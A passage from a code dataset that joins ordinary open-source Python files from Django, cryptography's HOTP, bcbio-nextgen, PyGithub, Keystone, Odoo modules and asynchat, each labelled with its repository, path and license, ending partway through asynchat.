url='http://www.djangoproject.com/',
author='Django Software Foundation',
author_email='foundation@djangoproject.com',
description=('A high-level Python Web framework that encourages '
'rapid development and clean, pragmatic design.'),
license='BSD',
packages=find_packages(exclude=EXCLUDE_FROM_PACKAGES),
include_package_data=True,
scripts=['django/bin/django-admin.py'],
entry_points={'console_scripts': [
'django-admin = django.core.management:execute_from_command_line',
]},
extras_require={
"bcrypt": ["bcrypt"],
},
zip_safe=False,
classifiers=[
'Development Status :: 3 - Alpha',
'Environment :: Web Environment',
'Framework :: Django',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Topic :: Internet :: WWW/HTTP',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
'Topic :: Internet :: WWW/HTTP :: WSGI',
'Topic :: Software Development :: Libraries :: Application Frameworks',
'Topic :: Software Development :: Libraries :: Python Modules',
],
)
if overlay_warning:
sys.stderr.write("""
========
WARNING!
========
You have just installed Django over top of an existing
installation, without removing it first. Because of this,
your install may now include extraneous files from a
previous version that have since been removed from
Django. This is known to cause a variety of problems. You
should manually remove the
%(existing_path)s
directory and re-install Django.
""" % {"existing_path": existing_path})
| bsd-3-clause |
enriquesanchezb/practica_utad_2016 | venv/lib/python2.7/site-packages/py/_code/assertion.py | 218 | 3287 | import sys
import py
BuiltinAssertionError = py.builtin.builtins.AssertionError
_reprcompare = None # if set, will be called by assert reinterp for comparison ops
def _format_explanation(explanation):
"""This formats an explanation
Normally all embedded newlines are escaped, however there are
three exceptions: \n{, \n} and \n~. The first two are intended
cover nested explanations, see function and attribute explanations
for examples (.visit_Call(), visit_Attribute()). The last one is
for when one explanation needs to span multiple lines, e.g. when
displaying diffs.
"""
raw_lines = (explanation or '').split('\n')
# escape newlines not followed by {, } and ~
lines = [raw_lines[0]]
for l in raw_lines[1:]:
if l.startswith('{') or l.startswith('}') or l.startswith('~'):
lines.append(l)
else:
lines[-1] += '\\n' + l
result = lines[:1]
stack = [0]
stackcnt = [0]
for line in lines[1:]:
if line.startswith('{'):
if stackcnt[-1]:
s = 'and '
else:
s = 'where '
stack.append(len(result))
stackcnt[-1] += 1
stackcnt.append(0)
result.append(' +' + ' '*(len(stack)-1) + s + line[1:])
elif line.startswith('}'):
assert line.startswith('}')
stack.pop()
stackcnt.pop()
result[stack[-1]] += line[1:]
else:
assert line.startswith('~')
result.append(' '*len(stack) + line[1:])
assert len(stack) == 1
return '\n'.join(result)
class AssertionError(BuiltinAssertionError):
def __init__(self, *args):
BuiltinAssertionError.__init__(self, *args)
if args:
try:
self.msg = str(args[0])
except py.builtin._sysex:
raise
except:
self.msg = "<[broken __repr__] %s at %0xd>" %(
args[0].__class__, id(args[0]))
else:
f = py.code.Frame(sys._getframe(1))
try:
source = f.code.fullsource
if source is not None:
try:
source = source.getstatement(f.lineno, assertion=True)
except IndexError:
source = None
else:
source = str(source.deindent()).strip()
except py.error.ENOENT:
source = None
# this can also occur during reinterpretation, when the
# co_filename is set to "<run>".
if source:
self.msg = reinterpret(source, f, should_fail=True)
else:
self.msg = "<could not determine information>"
if not self.args:
self.args = (self.msg,)
if sys.version_info > (3, 0):
AssertionError.__module__ = "builtins"
reinterpret_old = "old reinterpretation not available for py3"
else:
from py._code._assertionold import interpret as reinterpret_old
if sys.version_info >= (2, 6) or (sys.platform.startswith("java")):
from py._code._assertionnew import interpret as reinterpret
else:
reinterpret = reinterpret_old
| apache-2.0 |
wangyou/XX-Net | code/default/python27/1.0/lib/linux/cryptography/hazmat/primitives/twofactor/hotp.py | 7 | 2206 | # This file is dual licensed under the terms of the Apache License, Version
# 2.0, and the BSD License. See the LICENSE file in the root of this repository
# for complete details.
from __future__ import absolute_import, division, print_function
import struct
import six
from cryptography.exceptions import (
InvalidToken, UnsupportedAlgorithm, _Reasons
)
from cryptography.hazmat.backends.interfaces import HMACBackend
from cryptography.hazmat.primitives import constant_time, hmac
from cryptography.hazmat.primitives.hashes import SHA1, SHA256, SHA512
class HOTP(object):
def __init__(self, key, length, algorithm, backend):
if not isinstance(backend, HMACBackend):
raise UnsupportedAlgorithm(
"Backend object does not implement HMACBackend.",
_Reasons.BACKEND_MISSING_INTERFACE
)
if len(key) < 16:
raise ValueError("Key length has to be at least 128 bits.")
if not isinstance(length, six.integer_types):
raise TypeError("Length parameter must be an integer type.")
if length < 6 or length > 8:
raise ValueError("Length of HOTP has to be between 6 to 8.")
if not isinstance(algorithm, (SHA1, SHA256, SHA512)):
raise TypeError("Algorithm must be SHA1, SHA256 or SHA512.")
self._key = key
self._length = length
self._algorithm = algorithm
self._backend = backend
def generate(self, counter):
truncated_value = self._dynamic_truncate(counter)
hotp = truncated_value % (10 ** self._length)
return "{0:0{1}}".format(hotp, self._length).encode()
def verify(self, hotp, counter):
if not constant_time.bytes_eq(self.generate(counter), hotp):
raise InvalidToken("Supplied HOTP value does not match.")
def _dynamic_truncate(self, counter):
ctx = hmac.HMAC(self._key, self._algorithm, self._backend)
ctx.update(struct.pack(">Q", counter))
hmac_value = ctx.finalize()
offset = six.indexbytes(hmac_value, len(hmac_value) - 1) & 0b1111
p = hmac_value[offset:offset + 4]
return struct.unpack(">I", p)[0] & 0x7fffffff
| bsd-2-clause |
gifford-lab/bcbio-nextgen | bcbio/variation/population.py | 1 | 12759 | """Provide infrastructure to allow exploration of variations within populations.
Uses the gemini framework (https://github.com/arq5x/gemini) to build SQLite
database of variations for query and evaluation.
"""
import collections
import csv
from distutils.version import LooseVersion
import os
import subprocess
import toolz as tz
from bcbio import install, utils
from bcbio.distributed.transaction import file_transaction
from bcbio.pipeline import config_utils
from bcbio.pipeline import datadict as dd
from bcbio.provenance import do, programs
from bcbio.variation import multiallelic, vcfutils
def prep_gemini_db(fnames, call_info, samples, extras):
"""Prepare a gemini database from VCF inputs prepared with snpEff.
"""
data = samples[0]
out_dir = utils.safe_makedir(os.path.join(data["dirs"]["work"], "gemini"))
name, caller, is_batch = call_info
gemini_db = os.path.join(out_dir, "%s-%s.db" % (name, caller))
multisample_vcf = get_multisample_vcf(fnames, name, caller, data)
gemini_vcf = multiallelic.to_single(multisample_vcf, data)
use_gemini_quick = (do_db_build(samples) and
any(vcfutils.vcf_has_variants(f) for f in fnames))
if not utils.file_exists(gemini_db) and use_gemini_quick:
use_gemini = do_db_build(samples) and any(vcfutils.vcf_has_variants(f) for f in fnames)
if use_gemini:
ped_file = create_ped_file(samples + extras, gemini_vcf)
gemini_db = create_gemini_db(gemini_vcf, data, gemini_db, ped_file)
return [[(name, caller), {"db": gemini_db if utils.file_exists(gemini_db) else None,
"vcf": multisample_vcf if is_batch else None}]]
def create_gemini_db(gemini_vcf, data, gemini_db=None, ped_file=None):
if not gemini_db:
gemini_db = "%s.db" % utils.splitext_plus(gemini_vcf)[0]
if not utils.file_exists(gemini_db):
if not vcfutils.vcf_has_variants(gemini_vcf):
return None
with file_transaction(data, gemini_db) as tx_gemini_db:
gemini = config_utils.get_program("gemini", data["config"])
if "program_versions" in data["config"].get("resources", {}):
gemini_ver = programs.get_version("gemini", config=data["config"])
else:
gemini_ver = None
# Recent versions of gemini allow loading only passing variants
load_opts = ""
if not gemini_ver or LooseVersion(gemini_ver) > LooseVersion("0.6.2.1"):
load_opts += " --passonly"
# For small test files, skip gene table loading which takes a long time
if gemini_ver and LooseVersion(gemini_ver) > LooseVersion("0.6.4"):
if _is_small_vcf(gemini_vcf):
load_opts += " --skip-gene-tables"
if "/test_automated_output/" in gemini_vcf:
load_opts += " --test-mode"
# Skip CADD or gerp-bp if neither are loaded
if gemini_ver and LooseVersion(gemini_ver) >= LooseVersion("0.7.0"):
gemini_dir = install.get_gemini_dir(data)
for skip_cmd, check_file in [("--skip-cadd", "whole_genome_SNVs.tsv.compressed.gz")]:
if not os.path.exists(os.path.join(gemini_dir, check_file)):
load_opts += " %s" % skip_cmd
# skip gerp-bp which slows down loading
load_opts += " --skip-gerp-bp "
num_cores = data["config"]["algorithm"].get("num_cores", 1)
tmpdir = os.path.dirname(tx_gemini_db)
eanns = _get_effects_flag(data)
# Apply custom resource specifications, allowing use of alternative annotation_dir
resources = config_utils.get_resources("gemini", data["config"])
gemini_opts = " ".join([str(x) for x in resources["options"]]) if resources.get("options") else ""
cmd = ("{gemini} {gemini_opts} load {load_opts} -v {gemini_vcf} {eanns} --cores {num_cores} "
"--tempdir {tmpdir} {tx_gemini_db}")
cmd = cmd.format(**locals())
do.run(cmd, "Create gemini database for %s" % gemini_vcf, data)
if ped_file:
cmd = [gemini, "amend", "--sample", ped_file, tx_gemini_db]
do.run(cmd, "Add PED file to gemini database", data)
return gemini_db
def _get_effects_flag(data):
effects_config = tz.get_in(("config", "algorithm", "effects"), data, "snpeff")
if effects_config == "snpeff":
return "-t snpEff"
elif effects_config == "vep":
return "-t VEP"
else:
return ""
def get_affected_status(data):
"""Retrieve the affected/unaffected status of sample.
Uses unaffected (1), affected (2), unknown (0) coding from PED files:
http://pngu.mgh.harvard.edu/~purcell/plink/data.shtml#ped
"""
affected = set(["tumor", "affected"])
unaffected = set(["normal", "unaffected"])
phenotype = str(tz.get_in(["metadata", "phenotype"], data, "")).lower()
if phenotype in affected:
return 2
elif phenotype in unaffected:
return 1
else:
return 0
def create_ped_file(samples, base_vcf):
"""Create a GEMINI-compatible PED file, including gender, family and phenotype information.
Checks for a specified `ped` file in metadata, and will use sample information from this file
before reconstituting from metadata information.
"""
def _code_gender(data):
g = dd.get_gender(data)
if g and str(g).lower() in ["male", "m"]:
return 1
elif g and str(g).lower() in ["female", "f"]:
return 2
else:
return 0
out_file = "%s.ped" % utils.splitext_plus(base_vcf)[0]
sample_ped_lines = {}
header = ["#Family_ID", "Individual_ID", "Paternal_ID", "Maternal_ID", "Sex", "Phenotype", "Ethnicity"]
for md_ped in list(set([x for x in [tz.get_in(["metadata", "ped"], data)
for data in samples] if x is not None])):
with open(md_ped) as in_handle:
reader = csv.reader(in_handle, dialect="excel-tab")
for parts in reader:
if parts[0].startswith("#") and len(parts) > len(header):
header = header + parts[len(header):]
else:
sample_ped_lines[parts[1]] = parts
if not utils.file_exists(out_file):
with file_transaction(samples[0], out_file) as tx_out_file:
with open(tx_out_file, "w") as out_handle:
writer = csv.writer(out_handle, dialect="excel-tab")
writer.writerow(header)
batch = _find_shared_batch(samples)
for data in samples:
sname = dd.get_sample_name(data)
if sname in sample_ped_lines:
writer.writerow(sample_ped_lines[sname])
else:
writer.writerow([batch, sname, "-9", "-9",
_code_gender(data), get_affected_status(data), "-9"])
return out_file
def _find_shared_batch(samples):
for data in samples:
batch = tz.get_in(["metadata", "batch"], data, dd.get_sample_name(data))
if not isinstance(batch, (list, tuple)):
return batch
def _is_small_vcf(vcf_file):
"""Check for small VCFs which we want to analyze quicker.
"""
count = 0
small_thresh = 250
with utils.open_gzipsafe(vcf_file) as in_handle:
for line in in_handle:
if not line.startswith("#"):
count += 1
if count > small_thresh:
return False
return True
def get_multisample_vcf(fnames, name, caller, data):
"""Retrieve a multiple sample VCF file in a standard location.
Handles inputs with multiple repeated input files from batches.
"""
unique_fnames = []
for f in fnames:
if f not in unique_fnames:
unique_fnames.append(f)
out_dir = utils.safe_makedir(os.path.join(data["dirs"]["work"], "gemini"))
if len(unique_fnames) > 1:
gemini_vcf = os.path.join(out_dir, "%s-%s.vcf.gz" % (name, caller))
vrn_file_batch = None
for variant in data["variants"]:
if variant["variantcaller"] == caller and variant.get("vrn_file_batch"):
vrn_file_batch = variant["vrn_file_batch"]
if vrn_file_batch:
utils.symlink_plus(vrn_file_batch, gemini_vcf)
return gemini_vcf
else:
return vcfutils.merge_variant_files(unique_fnames, gemini_vcf, data["sam_ref"],
data["config"])
else:
gemini_vcf = os.path.join(out_dir, "%s-%s%s" % (name, caller, utils.splitext_plus(unique_fnames[0])[1]))
utils.symlink_plus(unique_fnames[0], gemini_vcf)
return gemini_vcf
def _has_gemini(data):
from bcbio import install
gemini_dir = install.get_gemini_dir(data)
return ((os.path.exists(gemini_dir) and len(os.listdir(gemini_dir)) > 0)
and os.path.exists(os.path.join(os.path.dirname(gemini_dir), "gemini-config.yaml")))
def do_db_build(samples, need_bam=True, gresources=None):
"""Confirm we should build a gemini database: need gemini + human samples + not in tool_skip.
"""
genomes = set()
for data in samples:
if not need_bam or data.get("align_bam"):
genomes.add(data["genome_build"])
if "gemini" in utils.get_in(data, ("config", "algorithm", "tools_off"), []):
return False
if len(genomes) == 1:
if not gresources:
gresources = samples[0]["genome_resources"]
return (tz.get_in(["aliases", "human"], gresources, False)
and _has_gemini(samples[0]))
else:
return False
def get_gemini_files(data):
"""Enumerate available gemini data files in a standard installation.
"""
try:
from gemini import annotations, config
except ImportError:
return {}
return {"base": config.read_gemini_config()["annotation_dir"],
"files": annotations.get_anno_files().values()}
def _group_by_batches(samples, check_fn):
"""Group data items into batches, providing details to retrieve results.
"""
batch_groups = collections.defaultdict(list)
singles = []
out_retrieve = []
extras = []
for data in [x[0] for x in samples]:
if check_fn(data):
batch = tz.get_in(["metadata", "batch"], data)
name = str(data["name"][-1])
if batch:
out_retrieve.append((str(batch), data))
else:
out_retrieve.append((name, data))
for vrn in data["variants"]:
if vrn.get("population", True):
if batch:
batch_groups[(str(batch), vrn["variantcaller"])].append((vrn["vrn_file"], data))
else:
singles.append((name, vrn["variantcaller"], data, vrn["vrn_file"]))
else:
extras.append(data)
return batch_groups, singles, out_retrieve, extras
def _has_variant_calls(data):
if data.get("align_bam"):
for vrn in data["variants"]:
if vrn.get("vrn_file") and vcfutils.vcf_has_variants(vrn["vrn_file"]):
return True
return False
def prep_db_parallel(samples, parallel_fn):
"""Prepares gemini databases in parallel, handling jointly called populations.
"""
batch_groups, singles, out_retrieve, extras = _group_by_batches(samples, _has_variant_calls)
to_process = []
has_batches = False
for (name, caller), info in batch_groups.iteritems():
fnames = [x[0] for x in info]
to_process.append([fnames, (str(name), caller, True), [x[1] for x in info], extras])
has_batches = True
for name, caller, data, fname in singles:
to_process.append([[fname], (str(name), caller, False), [data], extras])
if len(samples) > 0 and not do_db_build([x[0] for x in samples]) and not has_batches:
return samples
output = parallel_fn("prep_gemini_db", to_process)
out_fetch = {}
for batch_id, out_file in output:
out_fetch[tuple(batch_id)] = out_file
out = []
for batch_name, data in out_retrieve:
out_variants = []
for vrn in data["variants"]:
use_population = vrn.pop("population", True)
if use_population:
vrn["population"] = out_fetch[(batch_name, vrn["variantcaller"])]
out_variants.append(vrn)
data["variants"] = out_variants
out.append([data])
for x in extras:
out.append([x])
return out
| mit |
117111302/PyGithub | github/InputGitAuthor.py | 25 | 2443 | # -*- coding: utf-8 -*-
# ########################## Copyrights and license ############################
# #
# Copyright 2012 Vincent Jacques <vincent@vincent-jacques.net> #
# Copyright 2012 Zearin <zearin@gonk.net> #
# Copyright 2013 Vincent Jacques <vincent@vincent-jacques.net> #
# #
# This file is part of PyGithub. http://jacquev6.github.com/PyGithub/ #
# #
# PyGithub is free software: you can redistribute it and/or modify it under #
# the terms of the GNU Lesser General Public License as published by the Free #
# Software Foundation, either version 3 of the License, or (at your option) #
# any later version. #
# #
# PyGithub is distributed in the hope that it will be useful, but WITHOUT ANY #
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS #
# FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more #
# details. #
# #
# You should have received a copy of the GNU Lesser General Public License #
# along with PyGithub. If not, see <http://www.gnu.org/licenses/>. #
# #
# ##############################################################################
class InputGitAuthor(object):
"""
"""
def __init__(self, name, email, date):
"""
:param name: string
:param email: string
:param date: string
"""
assert isinstance(name, (str, unicode)), name
assert isinstance(email, (str, unicode)), email
assert isinstance(date, (str, unicode)), date # @todo Datetime?
self.__name = name
self.__email = email
self.__date = date
@property
def _identity(self):
return {
"name": self.__name,
"email": self.__email,
"date": self.__date,
}
| gpl-3.0 |
cernops/keystone | keystone/common/sql/migrate_repo/versions/104_drop_user_name_domainid_constraint.py | 4 | 2856 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import migrate
import sqlalchemy as sql
_USER_TABLE_NAME = 'user'
_USER_NAME_COLUMN_NAME = 'name'
_USER_DOMAINID_COLUMN_NAME = 'domain_id'
_USER_PASSWORD_COLUMN_NAME = 'password'
def upgrade(migrate_engine):
meta = sql.MetaData()
meta.bind = migrate_engine
user_table = sql.Table(_USER_TABLE_NAME, meta, autoload=True)
# NOTE(gnuoy): the `domain_id` unique constraint is not guaranteed to
# be a fixed name, such as 'ixu_user_name_domain_id`, so we need to
# search for the correct constraint that only affects
# user_table.c.domain_id and drop that constraint. (Fix based on
# morganfainbergs fix in 088_domain_specific_roles.py)
#
# This is an idempotent change that reflects the fix to migration
# 91 if the user name & domain_id unique constraint was not named
# consistently and someone manually fixed the migrations / db
# without dropping the old constraint.
# This is a copy of migration 97 to catch any/all deployments that
# are close to master. migration 97 will be backported to
# stable/mitaka.
to_drop = None
if migrate_engine.name == 'mysql':
for index in user_table.indexes:
if (index.unique and len(index.columns) == 2 and
_USER_DOMAINID_COLUMN_NAME in index.columns and
_USER_NAME_COLUMN_NAME in index.columns):
to_drop = index
break
else:
for index in user_table.constraints:
if (len(index.columns) == 2 and
_USER_DOMAINID_COLUMN_NAME in index.columns and
_USER_NAME_COLUMN_NAME in index.columns):
to_drop = index
break
# remove domain_id and name unique constraint
if to_drop is not None:
migrate.UniqueConstraint(user_table.c.domain_id,
user_table.c.name,
name=to_drop.name).drop()
# If migration 91 was aborted due to Bug #1572341 then columns may not
# have been dropped.
if _USER_DOMAINID_COLUMN_NAME in user_table.c:
user_table.c.domain_id.drop()
if _USER_NAME_COLUMN_NAME in user_table.c:
user_table.c.name.drop()
if _USER_PASSWORD_COLUMN_NAME in user_table.c:
user_table.c.password.drop()
| apache-2.0 |
ksophocleous/grpc | src/python/grpcio_test/grpc_test/framework/common/__init__.py | 1496 | 1530 | # Copyright 2015, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
| bsd-3-clause |
CompassionCH/compassion-modules | sponsorship_compassion/wizards/generate_gift_wizard.py | 3 | 6826 | # -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (C) 2014 Compassion CH (http://www.compassion.ch)
# Releasing children from poverty in Jesus' name
# @author: Emanuel Cino <ecino@compassion.ch>
#
# The licence is in the file __manifest__.py
#
##############################################################################
from odoo import api, fields, models, _
from odoo.tools import config
from dateutil.relativedelta import relativedelta
from ..models.product import GIFT_REF
import logging
logger = logging.getLogger(__name__)
test_mode = config.get('test_enable')
class GenerateGiftWizard(models.TransientModel):
""" This wizard generates a Gift Invoice for a given contract. """
_name = 'generate.gift.wizard'
amount = fields.Float("Gift Amount", required=True)
product_id = fields.Many2one(
'product.product', "Gift Type", required=True)
invoice_date = fields.Date(default=fields.Date.today())
description = fields.Char("Additional comments", size=200)
force = fields.Boolean(
'Force creation', help="Creates the gift even if one was already "
"made the same year.")
@api.multi
def generate_invoice(self):
# Read data in english
self.ensure_one()
if not self.description:
self.description = self.product_id.display_name
invoice_ids = list()
gen_states = self.env['recurring.contract.group']._get_gen_states()
# Ids of contracts are stored in context
for contract in self.env['recurring.contract'].browse(
self.env.context.get('active_ids', list())).filtered(
lambda c: 'S' in c.type and c.state in gen_states
):
if self.product_id.default_code == GIFT_REF[0]:
# Birthday Gift
if not contract.child_id.birthdate:
logger.error(
'The birthdate of the child is missing!')
continue
# This is set in the view in order to let the user
# choose the invoice date. Otherwise (called from code)
# the invoice date will be computed based on the
# birthday of the child.
if self.env.context.get('force_date'):
invoice_date = self.invoice_date
else:
invoice_date = self.compute_date_birthday_invoice(
contract.child_id.birthdate,
self.invoice_date)
begin_year = fields.Date.from_string(
self.invoice_date).replace(month=1, day=1)
end_year = begin_year.replace(month=12, day=31)
# If a gift was already made for the year, abort
invoice_line_ids = self.env[
'account.invoice.line'].search([
('product_id', '=', self.product_id.id),
('due_date', '>=', fields.Date.to_string(
begin_year)),
('due_date', '<=', fields.Date.to_string(
end_year)),
('contract_id', '=', contract.id),
('state', '!=', 'cancel')])
if invoice_line_ids and not self.force:
continue
else:
invoice_date = self.invoice_date
inv_data = self._setup_invoice(contract, invoice_date)
invoice = self.env['account.invoice'].create(inv_data)
invoice.action_invoice_open()
# Commit at each invoice creation. This does not break
# the state
if not test_mode:
self.env.cr.commit() # pylint: disable=invalid-commit
invoice_ids.append(invoice.id)
return {
'name': _('Generated Invoices'),
'view_mode': 'tree,form',
'view_type': 'form',
'res_model': 'account.invoice',
'domain': [('id', 'in', invoice_ids)],
'context': {'form_view_ref': 'account.invoice_form'},
'type': 'ir.actions.act_window',
}
@api.multi
def _setup_invoice(self, contract, invoice_date):
journal_id = self.env['account.journal'].search([
('type', '=', 'sale'),
('company_id', '=', contract.company_id.id)
], limit=1).id
return {
'type': 'out_invoice',
'partner_id': contract.gift_partner_id.id,
'journal_id': journal_id,
'date_invoice': invoice_date,
'payment_mode_id': contract.payment_mode_id.id,
'recurring_invoicer_id': self.env.context.get(
'recurring_invoicer_id', False),
'invoice_line_ids': [(0, 0, self.with_context(
journal_id=journal_id)._setup_invoice_line(contract))]
}
@api.multi
def _setup_invoice_line(self, contract):
self.ensure_one()
product = self.product_id
account = product.property_account_income_id.id or self.env[
'account.invoice.line']._default_account()
inv_line_data = {
'name': self.description,
'account_id': account,
'price_unit': self.amount,
'quantity': 1,
'product_id': product.id,
'contract_id': contract.id,
}
# Define analytic journal
analytic = self.env['account.analytic.default'].account_get(
product.id, contract.partner_id.id, date=fields.Date.today())
if analytic and analytic.analytic_id:
inv_line_data['account_analytic_id'] = analytic.analytic_id.id
return inv_line_data
@api.model
def compute_date_birthday_invoice(self, child_birthdate, payment_date):
"""Set date of invoice two months before child's birthdate"""
inv_date = fields.Date.from_string(payment_date)
birthdate = fields.Date.from_string(child_birthdate)
new_date = inv_date
if birthdate.month >= inv_date.month + 2:
new_date = inv_date.replace(day=28, month=birthdate.month - 2)
elif birthdate.month + 3 < inv_date.month:
new_date = birthdate.replace(
day=28, year=inv_date.year + 1) + relativedelta(months=-2)
new_date = max(new_date, inv_date)
return fields.Date.to_string(new_date)
| agpl-3.0 |
incaser/odoo-odoo | addons/stock/tests/test_resupply.py | 214 | 2457 | # -*- coding: utf-8 -*-
from openerp.addons.stock.tests.common import TestStockCommon
from openerp.tools import mute_logger, float_round
class TestResupply(TestStockCommon):
def setUp(self):
super(TestResupply, self).setUp()
self.Warehouse = self.env['stock.warehouse']
# create 2 WH, BIG and SMALL
# SMALL resupplies from BIG
self.bigwh = self.Warehouse.create({'name': 'BIG', 'code': 'B'})
self.smallwh = self.Warehouse.create({'name': 'SMALL', 'code': 'S',
'default_resupply_wh_id': self.bigwh.id,
'resupply_wh_ids': [(6, 0, [self.bigwh.id])],
})
# minimum stock rule for Product A on SMALL
Orderpoint = self.env['stock.warehouse.orderpoint']
Orderpoint.create({'warehouse_id': self.smallwh.id,
'location_id': self.smallwh.lot_stock_id.id,
'product_id': self.productA.id,
'product_min_qty': 100,
'product_max_qty': 200,
'product_uom': self.uom_unit.id,
})
# create some stock on BIG
Wiz = self.env['stock.change.product.qty']
wiz = Wiz.create({'product_id': self.productA.id,
'new_quantity': 1000,
'location_id': self.bigwh.lot_stock_id.id,
})
wiz.change_product_qty()
def test_resupply_from_wh(self):
sched = self.env['procurement.order']
sched.run_scheduler()
# we generated 2 procurements for product A: one on small wh and the
# other one on the transit location
procs = sched.search([('product_id', '=', self.productA.id)])
self.assertEqual(len(procs), 2)
proc1 = sched.search([('product_id', '=', self.productA.id),
('warehouse_id', '=', self.smallwh.id)])
self.assertEqual(proc1.state, 'running')
proc2 = sched.search([('product_id', '=', self.productA.id),
('warehouse_id', '=', self.bigwh.id)])
self.assertEqual(proc2.location_id.usage, 'transit')
self.assertNotEqual(proc2.state, 'exception')
proc2.run()
self.assertEqual(proc2.state, 'running')
self.assertTrue(proc2.rule_id)
| agpl-3.0 |
2uller/LotF | App/Lib/asynchat.py | 63 | 11716 | # -*- Mode: Python; tab-width: 4 -*-
# Id: asynchat.py,v 2.26 2000/09/07 22:29:26 rushing Exp
# Author: Sam Rushing <rushing@nightmare.com>
# ======================================================================
# Copyright 1996 by Sam Rushing
#
# All Rights Reserved
#
# Permission to use, copy, modify, and distribute this software and
# its documentation for any purpose and without fee is hereby
# granted, provided that the above copyright notice appear in all
# copies and that both that copyright notice and this permission
# notice appear in supporting documentation, and that the name of Sam
# Rushing not be used in advertising or publicity pertaining to
# distribution of the software without specific, written prior
# permission.
#
# SAM RUSHING DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE,
# INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS, IN
# NO EVENT SHALL SAM RUSHING BE LIABLE FOR ANY SPECIAL, INDIRECT OR
# CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS
# OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT,
# NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN
# CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
# ======================================================================
r"""A class supporting chat-style (command/response) protocols.
This class adds support for 'chat' style protocols - where one side
sends a 'command', and the other sends a response (examples would be
the common internet protocols - smtp, nntp, ftp, etc..).
The handle_read() method looks at the input stream for the current
'terminator' (usually '\r\n' for single-line responses, '\r\n.\r\n'
for multi-line output), calling self.found_terminator() on its
receipt.
for example:
Say you build an async nntp client using this class. At the start
of the connection, you'll have self.terminator set to '\r\n', in
order to process the single-line greeting. Just before issuing a
'LIST' command you'll set it to '\r\n.\r\n'. The output of the LIST
command will be accumulated (using your own 'collect_incoming_data'
method) up to the terminator, and then control will be returned to
you - by calling your self.found_terminator() method.
"""
import socket
import asyncore
from collections import deque
from sys import py3kwarning
from warnings import filterwarnings, catch_warnings
class async_chat (asyncore.dispatcher):
"""This is an abstract class. You must derive from this class, and add
the two methods collect_incoming_data() and found_terminator()"""
# these are overridable defaults
ac_in_buffer_size = 4096
ac_out_buffer_size = 4096
def __init__ (self, sock=None, map=None):
# for string terminator matching
self.ac_in_buffer = ''
# we use a list here rather than cStringIO for a few reasons...
# del lst[:] is faster than sio.truncate(0)
# lst = [] is faster than sio.truncate(0)
# cStringIO will be gaining unicode support in py3k, which
# will negatively affect the performance of bytes compared to
# a ''.join() equivalent
self.incoming = []
# we toss the use of the "simple producer" and replace it with
# a pure deque, which the original fifo was a wrapping of
self.producer_fifo = deque()
asyncore.dispatcher.__init__ (self, sock, map)
def collect_incoming_data(self, data):
raise NotImplementedError("must be implemented in subclass")
def _collect_incoming_data(self, data):
self.incoming.append(data)
def _get_data(self):
d = ''.join(self.incoming)
del self.incoming[:]
return d
def found_terminator(self):
raise NotImplementedError("must be implemented in subclass")
def set_terminator (self, term):
"Set the input delimiter. Can be a fixed string of any length, an integer, or None"
self.terminator = term
def get_terminator (self):
return self.terminator
# grab some more data from the socket,
# throw it to the collector method,
# check for the terminator,
# if found, transition to the next state.
def handle_read (self):
try:
data = self.recv (self.ac_in_buffer_size)
except socket.error, why:
self.handle_error()
return
self.ac_in_buffer = self.ac_in_buffer + data
# Continue to search for self.terminator in self.ac_in_buffer,
# while calling self.collect_incoming_data. The while loop
# is necessary because we might read several data+terminator
# combos with a single recv(4096).
while self.ac_in_buffer:
lb = len(self.ac_in_buffer)
terminator = self.get_terminator()
if not terminator:
# no terminator, collect it all
self.collect_incoming_data (self.ac_in_buffer)
self.ac_in_buffer = ''
elif isinstance(terminator, int) or isinstance(terminator, long):
# numeric terminator
n = terminator
if lb < n:
self.collect_incoming_data (self.ac_in_buffer)
self.ac_in_buffer = ''
self.terminator = self.terminator - lb
else:
self.collect_incoming_data (self.ac_in_buffer[:n])
